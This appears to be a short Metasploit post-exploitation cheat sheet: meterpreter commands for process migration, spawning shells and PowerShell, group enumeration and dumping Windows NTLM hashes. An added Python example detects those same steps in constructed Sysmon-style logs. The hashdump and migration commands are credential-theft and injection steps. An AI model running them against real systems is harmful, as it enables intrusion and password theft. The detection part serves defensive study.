Metasploit

Post Exploitation Workflow

getuid                 # Show the user the meterpreter session is running as
sysinfo                # Show OS version, architecture and hostname of the target
ps -S explorer.exe     # List processes, filtered by name "explorer.exe"
migrate <pid>          # Migrate the session into the process with that PID
shell                  # Spawn a cmd.exe process and drop into it

Check group members

net localgroup administrators    # List members of the local Administrators group

Load Powershell Extension

Spawn a powershell.exe in your meterpreter session, just like running the shell command spawns a cmd.exe in your session.

meterpreter> load powershell
meterpreter> powershell_shell

Dump windows users NTLM hashes

meterpreter> hashdump
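The commands on this page are the attacker side of the workflow. As an added example (not code from the original page), the Python rule set below shows what the same steps look like to a defender in Sysmon-style telemetry: net.exe enumerating a local group (Sysmon event 1, ProcessCreate), a remote thread created in another process as happens with migrate (event 8, CreateRemoteThread), and an unexpected image opening a handle to lsass.exe as credential-dumping tools do (event 10, ProcessAccess). The log records and the lsass allowlist are constructed for the demo and are assumptions, not real captures or a production allowlist.

```python
"""Added example, not part of the original page: flag the post-exploitation
steps above in Sysmon-style telemetry. All records below are constructed."""

from typing import Optional

# Real Sysmon event IDs: 1 = ProcessCreate, 8 = CreateRemoteThread,
# 10 = ProcessAccess. Field names follow Sysmon's schema.
PROCESS_CREATE = 1
CREATE_REMOTE_THREAD = 8
PROCESS_ACCESS = 10

# Assumption for the demo host: only these images are expected to open
# lsass.exe. A real allowlist is tuned per environment (AV/EDR agents etc.).
LSASS_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path ('' if missing)."""
    return path.lower().rsplit("\\", 1)[-1]


def classify(ev: dict) -> Optional[str]:
    """Return a finding for one Sysmon-style record, or None if benign."""
    eid = ev.get("EventID")
    if eid == PROCESS_CREATE:
        # "net localgroup administrators" executed from a shell
        cmd = ev.get("CommandLine", "").lower()
        if basename(ev.get("Image", "")) in {"net.exe", "net1.exe"} and "localgroup" in cmd:
            return "discovery: local group enumeration via net.exe"
    elif eid == CREATE_REMOTE_THREAD:
        # A thread started inside another process: this is how session
        # migration into e.g. explorer.exe surfaces (legitimate injectors too,
        # so triage the source image).
        src, dst = ev.get("SourceImage", ""), ev.get("TargetImage", "")
        if src and dst and src.lower() != dst.lower():
            return f"injection: remote thread from {basename(src)} into {basename(dst)}"
    elif eid == PROCESS_ACCESS:
        # A handle to lsass.exe from an image outside the allowlist
        src, dst = ev.get("SourceImage", ""), ev.get("TargetImage", "")
        if basename(dst) == "lsass.exe" and src.lower() not in LSASS_ALLOWLIST:
            return f"credential access: {basename(src)} opened lsass.exe"
    return None


def scan(events):
    """Run classify() over a list of records; return (index, finding) pairs."""
    return [(i, f) for i, ev in enumerate(events) if (f := classify(ev))]


# Constructed sample telemetry (not real logs)
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net localgroup administrators",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 8, "SourceImage": r"C:\Users\bob\AppData\Local\Temp\update.exe",
     "TargetImage": r"C:\Windows\explorer.exe"},
    {"EventID": 10, "SourceImage": r"C:\Windows\explorer.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(f"event #{idx}: {finding}")
```

Running the script prints three findings (events 0, 1 and 2) and stays quiet for the allowlisted csrss.exe access and the notepad launch. The remote-thread rule is deliberately broad; in practice it is paired with the source image's path and signer to separate a migrated session from an EDR or accessibility tool doing the same thing.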

Last updated 4 years ago